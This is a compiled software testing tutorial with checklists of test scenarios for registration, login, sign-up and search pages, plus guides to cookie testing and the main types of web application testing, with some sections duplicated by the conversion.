Software Testing Tutorial

1
Test Scenarios of a Registration Form:
1. Verify that the Registration form contains Username, First

Name, Last Name, Password, Confirm Password, Email Id,
Phone number, Date of birth, Gender, Location, Terms of use,
Submit, Login (If you already have an account)
2. Verify that tab functionality is working properly or not
3. Verify that Enter/Tab key works as a substitute for the Submit
button
4. Verify that all the fields such as Username, First Name, Last
Name, Password and other fields have a valid placeholder
5. Verify that the labels float upward when the text field is in focus
or filled (In case of floating label)
6. Verify that all the required/mandatory fields are marked with *
against the field
7. Verify that clicking on submit button after entering all the
mandatory fields, submits the data to the server
8. Verify that system generates a validation message when
clicking on submit button without filling all the mandatory fields.
9. Verify that entering blank spaces on mandatory fields lead to
validation error
10. Verify that clicking on submit button by leaving optional
fields, submits the data to the server without any validation error
11. Verify that case sensitivity of Username (usually
Username field should not follow case sensitivity – ‘rajkumar’ &
‘RAJKUMAR’ acts same)
12. Verify that system generates a validation message when
entering existing username
13. Verify that the character limit in all the fields (mainly
username and password) based on business requirement
14. Verify that the username validation as per business
requirement (in some application, username should not allow
numeric and special characters)
15. Verify that the validation of all the fields are as per
business requirement
16. Verify that the date of birth field should not allow the dates
greater than current date (some applications have age limit of
18 in that case you have to validate whether the age is greater
than or equal to 18 or not)
17. Verify that the validation of email field by entering
incorrect email id
18. Verify that the validation of numeric fields by entering
alphabets and characters
19. Verify that leading and trailing spaces are trimmed after
clicking on submit button
2
20. Verify that the “terms and conditions” checkbox is

unselected by default (depends on business logic, it may be
selected or unselected)
21. Verify that the validation message is displayed when
clicking on submit button without selecting “terms and
conditions” checkbox
22. Verify that the password is in encrypted form when
entered
23. Verify whether the password and confirm password are
same or not
Test Cases – Login Page

Following is the possible list of functional and non-functional test cases
for a login page:
Functional Test Cases:
Sr. Type- Negative/ Posit
Functional Test Cases
No. Case
1 Verify if a user will be able to login with a valid username and valid password. Positive
2 Verify if a user cannot login with a valid username and an invalid password. Negative
3 Verify the login page for both, when the field is blank and Submit button is clicked. Negative
4 Verify the ‘Forgot Password’ functionality. Positive
5 Verify the messages for invalid login. Positive
6 Verify the ‘Remember Me’ functionality. Positive
7 Verify if the data in password field is either visible as asterisk or bullet signs. Positive
8 Verify if a user is able to login with a new password only after he/she has changed Positive
the password.
9 Verify if the login page allows to log in simultaneously with different credentials in Positive
a different browser.
10 Verify if the ‘Enter’ key of the keyboard is working correctly on the login page. Positive
3
Sr. Type- Negative/ Posit

Functional Test Cases
No. Case
Other Test Cases
11 Verify the time taken to log in with a valid username and password. Performance & Positiv
12 Verify if the font, text color, and color coding of the Login page is as per the UI Testing & Positive T
standard.
13 Verify if there is a ‘Cancel’ button available to erase the entered text. Usability Testing
14 Verify the login page and all its controls in different browsers Browser Compatibility
Testing.
Non-functional Security Test Cases:

Show entries
Search:
Type-
Negat
ive/
Sr.
Security test cases Positi
No.
ve
Test
Case
1 Verify if a user cannot enter the characters more than the specified range in each field Nega
(Username and Password). tive
2 Verify if a user cannot enter the characters more than the specified range in each field Posit
(Username and Password). ive
3 Verify the login page by pressing ‘Back button’ of the browser. It should not allow you to Nega
enter into the system once you log out. tive
4 Verify the timeout functionality of the login session. Positive
5 Verify if a user should not be allowed to log in with different credentials from the same Nega
browser at the same time. tive
4
Type-
Negat
ive/
Sr.
Security test cases Positi
No.
ve
Test
Case
6 Verify if a user should be able to login with the same credentials in different browsers at the Posit
same time. ive
7 Verify the Login page against SQL injection attack. Nega

tive
8 Verify the implementation of SSL certificate. Posit

ive
Test Cases for Gmail Login page

Sr.
Test Scenarios
No.
1 Enter the valid email address & click next. Verify if the user gets an option to enter the password.
2 Don’t enter an email address or phone number & just click the Next button. Verify if the user will get the co
message or if the blank field will get highlighted.
3 Enter the invalid email address & click the Next button. Verify if the user will get the correct message.
4 Enter an invalid phone number & click the Next button. Verify if the user will get the correct message.
5 Verify if a user can log in with a valid email address and password.
6 Verify if a user can log in with a valid phone number and password.
7 Verify if a user cannot log in with a valid phone number and an invalid password.
8 Verify if a user cannot log in with a valid email address and a wrong password.
9 Verify the ‘Forgot email’ functionality.

5
Sr.
Test Scenarios
No.
10 Verify the ‘Forgot password’ functionality.
Test Scenarios for the Sign-up page

#1) Verify the messages for each mandatory field.
#2) Verify if the user cannot proceed without filling all the mandatory fields.
#3) Verify the age of the user when the DOB is selected.
#4) Verify if the numbers and special characters are not allowed in the First and
Last name.
#5) Verify if a user can sign-up successfully with all the mandatory details.
#6) Verify if a user can log in with the valid details.
#7) Verify if the Password and Confirm Password fields are accepting similar
strings only.
#8) Verify if the Password field will prompt you for the weak passwords.
#9) Verify if duplicate email address will not get assigned.
#10) Verify that hints are provided for each field on the form, for the ease of
use.
Test Scenarios for the Login page of Mobile Application
6
[image source]
#1) Verify if a user can log in with a valid username and password.
#2) Verify if a user cannot log in with an invalid username or password. Check
permutation and combinations of this.
#3) Verify the ‘Keep me Sign In’ option. If this check box is selected, then the
user should not get logged out even after exiting the app.
#4) Verify if this check box is not selected by default.
#5) If the user has signed up with Facebook or social media, verify that the user
can log in with those credentials or not.
#6) Verify the Forgot password functionality.
#7) Verify if the login page fits the mobile screen. The user should not have to
scroll the screen.
Conclusion
While writing test cases for login or sign-up page write the test cases for all the
fields. There should be a combination of both positive and negative test cases.
Try to cover the performance, security, and functional scenarios.
The login page is the page with fewer controls, so even though it is looking
simple for testing, it should not be considered as an easy task.
Also many a time it is the first impression of an application, so it should be

perfect for user interface and usability.
Test Scenarios Login Page [How

To Write Test Scenarios of a
Login Page]
Test Scenarios Login Page
In any application, logging in is the process to access an application by an
individual who has valid user credentials. Logging in is usually used to enter
a specific page, which trespassers cannot see. In this post, we will see “Test
Scenarios Login Page”. Testing of the Login page is very important for any
application in terms of security aspect. We will try to cover most widely used
Login Page scenarios here.
Must Read: Test Case Template With Detailed Explanation

We usually write test cases for login page for every application we
test. Every login page should have the following elements.
1. ‘Email/Phone Number/Username’ Textbox

2. ‘Password’ Textbox
3. Login Button
4. ‘Remember Me’ Checkbox
5. ‘Keep Me Signed In’ Checkbox
7
6. ‘Forgot Password’ Link

7. ‘Sign up/Create an account’ Link
8. CAPTCHA
Following are the test cases for User Login Page. The list consists of
both Positive and Negative test scenarios login page.
Must Read: Test Plan Template With Detailed Explanation

Test Cases of a Login Page (Test Scenarios Login Page):
1. Verify that cursor is focused on “Username” text box on the
page load (login page)
2. Verify that the login screen contains elements such as
Username, Password, Sign in button, Remember password
check box, Forgot password link, and Create an account link.
3. Verify that tab functionality is working properly or not
4. Verify that Enter/Tab key works as a substitute for the Sign in
button
5. Verify that all the fields such as Username, Password has a
valid placeholder
6. Verify that the labels float upward when the text field is in focus
or filled (In case of floating label)
7. Verify that User is able to Login with Valid Credentials
8. Verify that User is not able to Login with invalid Username and
invalid Password
9. Verify that User is not able to Login with Valid Username and
invalid Password
10. Verify that User is not able to Login with invalid Username
and Valid Password
11. Verify that User is not able to Login with blank Username
or Password
12. Verify that User is not able to Login with inactive
credentials
13. Verify that clicking on browser back button after
successful login should not take User to log out mode
14. Verify that clicking on browser back button after
successful logout should not take User to logged in mode
15. Verify that there is a limit on the total number of
unsuccessful login attempts (No. of invalid attempts should be
based on business logic. Based on the business logic, User will
be asked to enter captcha and try again or user will be blocked)
16. Verify that the password is in encrypted form when
entered
17. Verify the password can be copy-pasted
18. Verify that encrypted characters in “Password” field
should not allow deciphering if copied
8
19. Verify that User should be able to login with the new
password after changing the password
20. Verify that User should not be able to login with the old
password after changing the password
21. Verify that spaces should not be allowed before any
password characters attempted
22. Verify that whether User is still logged in after series of
actions such as sign in, close browser and reopen the
application.
23. Verify that the ways to retrieve the password if the User
forgets the password
24. Verify that “Remember password” checkbox is
unselected by default (depends on business logic, it may be
selected or unselected)
25. Verify that “Keep me logged in” checkbox is unselected
by default (depends on business logic, it may be selected or
unselected)
26. Verify that the timeout of the login session (Session
Timeout)
27. Verify that the logout link is redirected to login/home page
28. Verify that User is redirected to appropriate page after
successful login
29. Verify that User is redirected to Forgot password page
when clicking on Forgot Password link
30. Verify that User is redirected to Create an account page
when clicking on Sign up / Create an account link
31. Verify that validation message is displayed in case when
User leaves Username or Password as blank
32. Verify that validation message is displayed in case of
exceeding the character limit of the Username and Password
fields
33. Verify that validation message is displayed in case of
entering special character in the Username and password fields
34. Verify whether the login form is revealing any security
information by viewing page source
35. Verify that the login page is vulnerable to SQL injection
36. Verify whether Cross-site scripting (XSS ) vulnerability
work on a login page. XSS vulnerability may be used by hackers
to bypass access controls.
If there is a captcha on the login page (Test Cases for
CAPTCHA):
37. Verify that whether there is a client-side validation when
User doesn’t enter CAPTCHA
38. Verify that the refresh link of CAPTCHA is generating new
CAPTCHA
39. Verify that the CAPTCHA is case sensitive
9
40. Verify whether the CAPTCHA has audio support to listen
Learn Website Cookie Testing –

Complete Guide [Cookie Testing
Test Cases] |
SoftwareTestingMaterial
Website Cookie Testing
In this Cookie Testing Tutorial, we will see what is a cookie, what is the role
of cookies in web application and how to write test cases to test web
application cookies. As a Software Tester, we need to test cookies
whenever we test websites. In this tutorial, we will see some tools to test
cookies and tools to test whether your local system is accepting cookies or
not and also a tool to test whether any particular domain is accepting
cookies or not.
• 1. What is a Cookie
• 2. How do Cookies work
• 3. Types of Cookies
• 4. Where Are Cookies Stored In Different Browsers
• 5. Cookie Testing
• 6. How to test Cookies – Sample Test Cases for Web Application Cookie
Testing
• 7. Plugins To Test Cookies
What is a Cookie?
A Cookie is also known as HTTP cookie, web cookie, internet cookie,
browser cookie.
A Cookie is a small piece of information sent from a website and stored on

the users in the users hard drive (in a text file) by the user’s web browser
while the user is browsing and is sent back to the website each time the
browser requests a page from the website. Cookies were designed to track
the users browsing activities such as login credentials, visited pages or to
store stateful information such as items added in the shopping cart in an
online store or to record the information which was filled by the user in the
form fields such as name, card details, address details etc., So it stores
personalized information such as login details, language preference, mobile
version or desktop version preference etc., Usually cookies store information
for shorter periods. Cookies are used while implementing User sessions,
User tracking, Advertisements, Shopping cart etc.,
10
How do Cookies work?

Assume there is a website which serves in two languages say English and
Burmese. The website by default opens in the Burmese language and it
allows users to change the language to English to view the site in English.
You are an English guy who wants to view the website always in English. If
the website serves cookies to store language then once you change the
language from Burmese to English then whenever you are back to the site,
the site will load in English. Here cookies in your local system communicate
with the web server and requests webpage in the English language. So the
web pages on your browser will load in English.
Remember there will be an expiration time for cookies. Expiration time

varies from website to website and it is set while writing the cookie code.
Cookies contain the attributes such as Domain name (from where the cookie
was sent), a random value (which is a unique number), a lifetime of Cookie
(Expires and Max-Age), and path of the cookie.
Types of Cookies:
Usually, there are two types of cookies.
Session Cookies:
As the name suggests, session cookies work until the session has been
destroyed. This type of cookie will last until the browser that triggers the
cookie is closed.
It is also called as an in-memory cookie or transient cookie. Session cookies

do not have an expiration date assigned to them.
In simple words, it stores in a temporary memory which expires once you

close your browser.
Persistent Cookies:
Persistent cookies continue to exist until its time runs out. These cookies
store in users hard disk for days, months or years depends on the cookie
creator. These cookies will be used to track the users browsing activities.
These are also called as tracking cookies which are used for legitimate
purposes such as keeping you logged into the account without re-entering
your account details or displaying the advertisements based on users
previous browsing history.
Where Are Cookies Stored In Different Browsers?

Cookies are stored in Users system depends on the browser.
11
Chrome: Settings – Advanced – Privacy and security – Content Settings –

Cookies – See all cookies and site data
Firefox: Open Firefox and click on Hamburger menu – Go to Options –
Privacy – Remove individual cookies
Internet Explorer: Internet options – Settings – Temporary Internet Files –
View files
Safari: Edit – Preferences – Privacy – Details – Manage website data
Cookie Testing:
Cookie Testing is the process of verifying whether the cookies are working
as intended or not. In cookie testing, testers need to test the status of the
cookie, expiration of cookie, accessibility of cookie, security constraints, etc.,
How to test Cookies – Sample Test Cases for Web

Application Cookie Testing:
Important Test Scenarios for Testing Cookies of a Web Applications are
listed below. You can use this cookie testing checklist to do Cookie Testing.
1. Verify that whether the application is creating cookies on disk
2. Verify whether the user is able to access the application after disabling the
cookies.
Disabling Cookies: Web pages may crash if we disable the cookies.
Disable cookies on your browser. Access the website after all the cookies
are disabled on your browser. There shouldn’t be any crashers or blockers.
Here you need to verify two things:
i. Is there an appropriate message displaying to the Users to enable cookies
to access the site
ii. Is there any workaround to access the site for the browsers with cookies
disabled.
3. Verify whether the user is able to access the application after removing the
cookies.
Removing Cookies: Remove all the cookies related to the website you are
testing and check whether the website is working without any crash.
Removal of cookies may result in loss of data and leads to system crash.
4. Verify whether the user is able to access the application after deleting the
cookies.
Deleting Cookies: Make sure your website is creating cookies. Once the
cookie is created, close the browser and delete cookies manually. Now
open the browser and navigate to the website and test the behavior of the
website. Deleting the cookies may sometimes break the website.
5. Verify whether the user is able to access the application after corrupting (by
editing) the cookies
Corrupting Cookies: Manually edit the cookie using any plugin. You can
also open cookies using notepad. Earlier we have mentioned where cookies
are stored. Change the values (such as expiry date of the cookie or name of
the cookie) of the cookies with irrelevant data.
Try to change the login credentials of a User in the cookie with another valid
User and try to do login. System shouldn’t allow you to log in with the
modified User details.
6. Verify whether all the sensitive data (user credentials) stored in a cookie is
in the form of encrypted or not. (Cookies Encryption)
7. Verify whether the cookies are being written correctly on all supported
browsers. (Cross Browser Testing)
Learn More About Cross Browser Testing & CrossBrowserTesting Tool
12
8. Verify that the user is able to access the site by not accepting all the
cookies.
Accept or Reject Cookies: Make sure your browser is writing cookies.
Access the website and allow the browser to write cookies. Now disable the
cookies and try to access the site. Doing this may crash your site.
9. Verify that there should not be overuse of cookies.
No Overuse of Cookies: Overuse of cookies bring the site traffic down.
Also, prompting for cookies quite often irritates the Users. Ultimately your
site will lose traffic. Loss of traffic brings your business down.
10. Verify that no personal or sensitive data is stored in the cookie.
Privacy testing: In some cases, websites collect personal or sensitive data
and store it in cookies. Make sure that the personal or sensitive data stored
in a cookie is in an encrypted format.
If you have come across any other test scenarios of website cookie testing,
please mention it in the comments below.
Plugins To Test Cookies:

For Google Chrome Users:
EditThisCookie – Here is the download link
For Mozilla Firefox Users:

Mozilla Advanced Cookie Manager – Here is the download link
Some other tools to test the cookies

Cookie Tester – Here is the link to the site
This site is used to test your browser cookies related settings. You can
request this site to send a cookie to your browser. If you’ve configured your
browser to reject cookies, you can request this site to send a cookie to the
browser and check if the cookie gets rejected. If you’ve configured your
browser to accept cookies, you can use this page to make sure that the
cookies are being sent and aren’t getting blocked.
• Set the Cookie name and Value

• Click on ‘Set TestCookie’
If you have disabled the cookies then the cookie should be rejected.
Cookie Checker – Here is the link to the site
This site checks the cookies from a site and gives a full report on the
purpose of each cookie.
Conclusion
The purpose of a cookie is to identify users to save login information of a
website or prepare customized web pages. Cookie saves the time of Users
when they revisit the site. Cookie testing is quite common and important in
terms of security and quick access to any web application. As a web
application tester, you have to include cookie testing as a part of your test
plan.
13
Like this post? Share it with your friends! If you have any queries, please
comment below.
Here are a few hand-picked Tutorials for you to read next:
• CrossBrowserTesting Tool – Review

• GUI Testing with FrogLogic Squish
• Learn Test Managment Tool – TestLodge
• TestCaseLab – Test Case Management Tool
• Running Selenium Tests with BrowserStack
• Selenium Continuous Integration Testing
• Why You Choose Software Testing As A Career
• How To Explain Test Automation Framework In The Interview
20 Scenarios for Testing login

Pages & Search Functionalities
By Ajit Pendse
I recently had a conversation with a prospect and when I mentioned website UX testing to
him, he paused and asked me with a dubious tone, “Why does a website need UX testing?”
I explained to him that, few major reasons why UX testing is so important is

because improved user experience ensures customer satisfaction, retention & product
promotion through mouth publicity. If the users cannot find what they are looking for on
one website, they will inevitably move on to the next with the same product offering. So
even if a site looks breathtaking and gets lots of bell and whistles for it, if the user can’t
figure out how to use it, he is bound to move on.
While explaining this to him, it struck me that, UX testers often invest time and efforts to
test some of the most complex scenarios possible to curate the best user experience.
However, in the pursuit of testing these complex scenarios, it may so happen that they may
miss out on testing the basic but crucial functionalities, such as the Login & Search
Functionality.
In this blog, we provide a handy list of 20+ test scenarios which are a must-add to the list
of test cases – specifically for testing login page and search functionality.
Login Scenarios:
GUI & Functionality:
1. Minimum and Maximum lengths should be set for all the text boxes
2. Password should be displayed in masked format rather than showing actual text
format
3. Login credentials in UPPER case should not be treated as invalid
4. Validation message should be shown when special characters are entered in the
username field, or when invalid username and/or password is entered or the
fields are left blank
5. Reset button should clear data from all the text boxes in the form
14
6. Login credentials, especially password, should be stored in database in encrypted

format
Security:
1. When logged in user copy URL and paste in new browser window, it should
redirect to Login page
2. Users should not be allowed to copy and paste Password from text box
3. Notification email for multiple device login - if user login from unusual
device/machine
4. Entering Login credentials using virtual keyboard should be provided for banking
application
5. After 3 or 5 unsuccessful attempts of login, user login credentials should get
locked for specific period e.g. 24 hours
6. SSL certificate should be implemented/installed for Secured Website
7. SQL injection attacks & XSS should be verified for login
8. Two-way authentication through OTP on mobile/email should be tested for
banking application
Session:
1. After logout if user clicks on back button user should not be able to login within
same session, it should redirect to login page
2. If user logged in on multiple devices and Logout from one device then it should
Logout from all platform/devices
3. Maximum Session out time should be set for Secured website
Browser:
1. If Browser cookies are cleared and user tries to login, the system should ask for
credentials again
2. ‘Remember Form Data’ setting of the browser should not remember the password
3. Validate the login functionality when browser cookies are turned OFF
Predict the quality of your project with Agile

Testing. Get a free guide today!
Search Scenarios
1. Search results displayed should be relevant to search keyword
2. % sign in search keyword should not redirect to 404 ERROR
3. Application should not crash if user inserted % in search field
4. When user start typing word in text box it should suggest words that matches
typed keyword
5. There should be pre-defined search criteria for auto complete e.g. after typing first
3 letter it should suggest matching keyword
6. When user clicks on any link from result and navigates back, then result should be
maintained
7. After clicking Search field - search history should be displayed (latest search
keyword)
15
8. All search keyword/filters should get cleared on clicking Reset button

9. Search results should be cleared on clicking clear search button
10. History displayed in search field should be relevant to logged in user only
11. Pagination should be tested for searches returning high number of records
12. Total number of search records/results should be displayed on page
13. Search keyword should get highlighted with color in the search results
14. For ecommerce sites - search keyword should suggest similar kind of
product/items
15. For Advanced Search - limited search filters should be provided
16. Water text should be provided for user to understand what to search
17. Validate search rules defined for “Exact Match” with the search key word
18. Validate search rules defined for “Similar Match” with the search key word
19. Validate search rules defined to search with a set of keywords
20. User should be able to search when he enters the keyword and hits ‘Enter’ button
on keyboard
16
How to test Web Application:

To do web application testing effectively, we perform the following
testing types or testing techniques depending on our test
requirements.
1. Documentation Testing
2. Functionality Testing
3. Usability Testing
4. Interface Testing
5. Database Testing
6. Compatibility Testing
7. Performance Testing
8. Security Testing
9. Crowd Testing
Also read: 100+ Types of Software Testing
Documentation Testing:
Poor documentation can affect the quality of the product. Good
product documentation plays a critical role in the final product. So
documentation testing has a vital role in Software Testing. Testing the
documented artifacts that are developed prior, during and after the
testing of a product is known as documentation testing.
Some commonly used artifacts are as follows

• Requirement documents
• Test Plan
• Test Cases
• Traceability Matrix (RTM)
Read more on Documentation Testing here
Functionality Testing:
What the system actually does is functional testing. To verify that each
function of the software application behaves as specified in the
requirement document. Testing all the functionalities by providing
appropriate input to verify whether the actual output is matching the
expected output or not. It is used for checking the workflows, all the
links of the web pages, form testing, cookie testing, and database
connection.
Typically, functional testing includes the following tasks:

Testing UI Workflows.
17
A tester needs to test end to end workflow or business scenarios.

Writing test scenarios or test cases would be recommended to cover
different scenarios and set pass criteria.
Testing HyperLinks (Link Testing):

A tester needs to ensure all the links on a website are working
correctly and make sure there are no broken links. Types of links
include Internal links, Outgoing links, Anchor links, etc.,
Forms Testing (Input field validation):
Forms are used to do interactive communication with end users. A
tester needs to ensure all the forms are working as expected.
Forms testing includes:
• Verify whether the default values are being populated

• Verify whether an error message is shown when a user does
not fill a mandatory field
• Verify whether the form is accepting invalid values or not
• Verify whether the forms are optimally formatted for better
readability
• Verify whether the AJAX fields are populating the values
correctly at run time
• Verify whether the drop-down lists are loading with options
Cookie Testing:
A Cookie is a small piece of information sent from a website and
stored on the users in the users hard drive (in a text file) by the user’s
web browser while the user is browsing and is sent back to the
website each time the browser requests a page from the website.
Cookie Testing is the process of verifying whether the cookies are

working as intended or not. In cookie testing, testers need to test the
status of the cookie, expiration of cookie, accessibility of cookie,
security constraints, etc.,
Read more on Cookie Testing here

Validate HTML and CSS:
A tester needs to test whether a site has clean HTML structure and
optimized CSS as per W3C standards. Also to ensure that search
engines can crawl the site easily.
• Verify HTML syntax errors

• Verify color schemas are readable
• Verify the sitemap are accurate or not
Useful tools to perform functional website testing are Selenium, IBM
Rational, UFT, etc.,
18
Usability Testing:
To verify whether the application is user-friendly or not and was
comfortably used by an end user or not. The main focus in this testing
is to check whether the end user can understand and operate the
application easily or not. An application should be self-exploratory and
must not require training to operate it.
Usability testing is performed by testers internally or by getting

external testers (a small focus group) that fit the target audience of the
web application.
Usability testing involves test the site navigation and tests the content.
Test the site navigation:
Navigation testing includes:
• All pages of your site are understandable and easy to use

• Menus, Buttons, Links are easily visible and consistent on all
webpages
Test the Content:
Content testing checklist:
• There are no grammar and spelling mistakes
• Images should contain an “alt” text
• Content should be informative, understandable, and logically
linked
Interface Testing:
Interface testing is to test the interface between the web server and
application server, application server and database server have proper
interaction or not. It ensures a positive user experience. It includes
verifying the communication processes as well as making sure that
error messages are displaying correctly.
Database Testing:
It is AKA back-end testing or data testing.
Database testing involves verifying the integrity of data in the front end
with the data present in the back end. It validates the schema,
database tables, columns, indexes, stored procedures, triggers, data
duplication, orphan records, junk records. It involves updating records
in a database and verifying the same on the front end.
19
Database testing includes the following:
• Data validity testing

• Data integrity testing
• Database performance testing
• Testing of procedures, triggers, and functions
Compatibility Testing:
Compatibility testing is to ensure whether an application is compatible
across different browsers and on a variety of devices.
Browser Compatibility Testing:

Cross Browser Testing is a type of non-functional test which helps us
ensure that our website or web application works as expected in
various web browsers.
While testing a website, we need to ensure that our website is

appearing the same across all the browsers. To do this we need to
have all the browsers. Fortunately, there are some tools to perform
cross-browser testing without testing individually in a manual way.
We need to provide the same experience for users no matter what

type of OS, the browser they are using. Not everyone uses the same
environment. Even though Google Chrome is the most popular one in
the current market, still most of the users are using Mozilla Firefox,
Safari and others. If a website doesn’t function properly on a particular
browser, then user experience hurts
Device Compatibility Testing:
This test confirms that the web application is responsive and works on
devices of different sizes and different operating systems.
Performance Testing:
In software, performance testing (also called Perf Testing) determines
or validates the speed, scalability, and/or stability characteristics of the
system or application under test. Performance is concerned with
achieving response times, throughput, and resource-utilization levels
that meet the performance objectives for the project or product.
Web application performance testing is conducted to mitigate the risk

of availability, reliability, scalability, responsiveness, stability, etc. of a
system.
20
Performance testing encompasses a number of different types of

testing like load testing, volume testing, stress testing, capacity
testing, soak/endurance testing and spike testing each of which is
designed to uncover or solve performance problems in a system.
Capacity Testing:
Capacity Testing is to determine how many users a system/application
can handle successfully before the performance goals become
unacceptable. This allows us to avoid the potential problems in the
future such as increased user base or increased volume of data. It
helps users to identify a scaling strategy in order to determine whether
a system should scale up or scale out. It is done majorly for
eCommerce and Banking sites. are some examples. This testing is
sometimes called Scalability testing.
Load Testing:
Load Testing is to verify that a system/application can handle the
expected number of transactions and to verify the system/application
behavior under both normal and peak load conditions (no. of users).
Volume Testing:
Volume Testing is to verify whether a system/application can handle a
large amount of data. This testing focuses on Data Base. Performance
tester who does volume testing has to populate a huge volume of data
in a database and monitors the behavior of a system.
Stress Testing:
Stress Testing is to verify the behavior of the system once the load
increases more than the system’s design expectations. This testing
addresses which components fail first when we stress the system by
applying the load beyond the design expectations. So that we can
design a more robust system.
Soak/Endurance Testing:
Soak Testing is aka Endurance Testing. Running a system at high
load for a prolonged period of time to identify the performance
problems is called Soak Testing. It is to make sure the software can
handle the expected load over a long period of time.
Spike Testing:
Spike Testing is to determine the behavior of the system under a
sudden increase of load (a large number of users) on the system.
Read more on Performance Testing here

21
Security Testing:
Security testing is a process to determine whether the system protects
data and maintains functionality as intended.
Security testing aims to find out all possible loopholes and
weaknesses of the system in the starting stage itself to avoid
inconsistent system performance, unexpected breakdown, loss of
information, loss of revenue, loss of customer’s trust.
Security tests include testing for vulnerabilities such as
• SQL Injection
• Cross-Site Scripting (XSS)
• Session Management
• Broken Authentication
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Failure to Restrict URL Access
• Secure Data Exposure
• Insecure Direct Object Reference
• Missing Function Level Access Control
• Using Components with Known Vulnerabilities
• Unvalidated Redirects and Forwards
Read more on Security Testing here
Crowd Testing or Crowdsourced testing:

Crowd testing or crowdsourced testing is an emergent trend in
Software Testing which leverages a crowd (a large number of people)
to test software applications quickly and effectively. Usually, testing is
done by in-house software testers or outsourced QA consultants
whereas crowdsourced testing is done by a community of expert QAs
around the world through an online crowdsourced platform.
Conclusion:
Hope you have found the answer to the question “how to test a
website” and it helps you build a better plan for website testing. If you
have any questions, please leave a comment in the comment section
below.
22
Learn Website Cookie Testing –

Complete Guide [Cookie Testing
Test Cases] |
Website Cookie Testing
In this Cookie Testing Tutorial, we will see what is a cookie, what is the role
of cookies in web application and how to write test cases to test web
application cookies. As a Software Tester, we need to test cookies
whenever we test websites. In this tutorial, we will see some tools to test
cookies and tools to test whether your local system is accepting cookies or
not and also a tool to test whether any particular domain is accepting
cookies or not.
• 1. What is a Cookie
• 2. How do Cookies work
• 3. Types of Cookies
• 4. Where Are Cookies Stored In Different Browsers
• 5. Cookie Testing
• 6. How to test Cookies – Sample Test Cases for Web Application Cookie
Testing
• 7. Plugins To Test Cookies
What is a Cookie?
A Cookie is also known as HTTP cookie, web cookie, internet cookie,
browser cookie.
A Cookie is a small piece of information sent from a website and

stored on the users in the users hard drive (in a text file) by the user’s
web browser while the user is browsing and is sent back to the
website each time the browser requests a page from the website.
Cookies were designed to track the users browsing activities such as
login credentials, visited pages or to store stateful information such as
items added in the shopping cart in an online store or to record the
information which was filled by the user in the form fields such as
name, card details, address details etc., So it stores personalized
information such as login details, language preference, mobile version
or desktop version preference etc., Usually cookies store information
for shorter periods. Cookies are used while implementing User
sessions, User tracking, Advertisements, Shopping cart etc.,
How do Cookies work?

Assume there is a website which serves in two languages say English
and Burmese. The website by default opens in the Burmese language
23
and it allows users to change the language to English to view the site
in English. You are an English guy who wants to view the website
always in English. If the website serves cookies to store language then
once you change the language from Burmese to English then
whenever you are back to the site, the site will load in English. Here
cookies in your local system communicate with the web server and
requests webpage in the English language. So the web pages on your
browser will load in English.
Remember there will be an expiration time for cookies. Expiration time

varies from website to website and it is set while writing the cookie
code.
Cookies contain the attributes such as Domain name (from where the
cookie was sent), a random value (which is a unique number), a
lifetime of Cookie (Expires and Max-Age), and path of the cookie.
Types of Cookies:
Usually, there are two types of cookies.
Session Cookies:
As the name suggests, session cookies work until the session has
been destroyed. This type of cookie will last until the browser that
triggers the cookie is closed.
It is also called as an in-memory cookie or transient cookie. Session

cookies do not have an expiration date assigned to them.
In simple words, it stores in a temporary memory which expires once

you close your browser.
Persistent Cookies:
Persistent cookies continue to exist until its time runs out. These
cookies store in users hard disk for days, months or years depends on
the cookie creator. These cookies will be used to track the users
browsing activities. These are also called as tracking cookies which
are used for legitimate purposes such as keeping you logged into the
account without re-entering your account details or displaying the
advertisements based on users previous browsing history.
Where Are Cookies Stored In Different Browsers?

Cookies are stored in Users system depends on the browser.
24
Chrome: Settings – Advanced – Privacy and security – Content

Settings – Cookies – See all cookies and site data
Firefox: Open Firefox and click on Hamburger menu – Go to Options
– Privacy – Remove individual cookies
Internet Explorer: Internet options – Settings – Temporary Internet
Files – View files
Safari: Edit – Preferences – Privacy – Details – Manage website data
Cookie Testing:
Cookie Testing is the process of verifying whether the cookies are
working as intended or not. In cookie testing, testers need to test the
status of the cookie, expiration of cookie, accessibility of cookie,
security constraints, etc.,
How to test Cookies – Sample Test Cases for Web

Application Cookie Testing:
Important Test Scenarios for Testing Cookies of a Web Applications
are listed below. You can use this cookie testing checklist to do
Cookie Testing.
1. Verify that whether the application is creating cookies on disk
2. Verify whether the user is able to access the application after
disabling the cookies.
Disabling Cookies: Web pages may crash if we disable the
cookies. Disable cookies on your browser. Access the website
after all the cookies are disabled on your browser. There
shouldn’t be any crashers or blockers.
Here you need to verify two things:
i. Is there an appropriate message displaying to the Users to
enable cookies to access the site
ii. Is there any workaround to access the site for the browsers
with cookies disabled.
removing the cookies.
Removing Cookies: Remove all the cookies related to the
website you are testing and check whether the website is
working without any crash. Removal of cookies may result in
loss of data and leads to system crash.
deleting the cookies.
Deleting Cookies: Make sure your website is creating cookies.
Once the cookie is created, close the browser and delete
cookies manually. Now open the browser and navigate to the
website and test the behavior of the website. Deleting the
cookies may sometimes break the website.
corrupting (by editing) the cookies
Corrupting Cookies: Manually edit the cookie using any plugin.
25
You can also open cookies using notepad. Earlier we have

mentioned where cookies are stored. Change the values (such
as expiry date of the cookie or name of the cookie) of the
cookies with irrelevant data.
Try to change the login credentials of a User in the cookie with
another valid User and try to do login. System shouldn’t allow
you to log in with the modified User details.
6. Verify whether all the sensitive data (user credentials) stored in
a cookie is in the form of encrypted or not. (Cookies
Encryption)
7. Verify whether the cookies are being written correctly on all
supported browsers. (Cross Browser Testing)
Learn More About Cross Browser
Testing & CrossBrowserTesting Tool
8. Verify that the user is able to access the site by not accepting all
the cookies.
Accept or Reject Cookies: Make sure your browser is writing
cookies. Access the website and allow the browser to write
cookies. Now disable the cookies and try to access the site.
Doing this may crash your site.
9. Verify that there should not be overuse of cookies.
No Overuse of Cookies: Overuse of cookies bring the site
traffic down. Also, prompting for cookies quite often irritates the
Users. Ultimately your site will lose traffic. Loss of traffic brings
your business down.
10. Verify that no personal or sensitive data is stored in the
cookie.
Privacy testing: In some cases, websites collect personal or
sensitive data and store it in cookies. Make sure that the
personal or sensitive data stored in a cookie is in an encrypted
format.
If you have come across any other test scenarios of website cookie
testing, please mention it in the comments below.
Plugins To Test Cookies:

For Google Chrome Users: extensia “Edit this cookie”
For Mozilla Firefox Users:
Mozilla Advanced Cookie Manager
Some other tools to test the cookies
Cookie Tester
This site is used to test your browser cookies related settings. You can
request this site to send a cookie to your browser. If you’ve configured
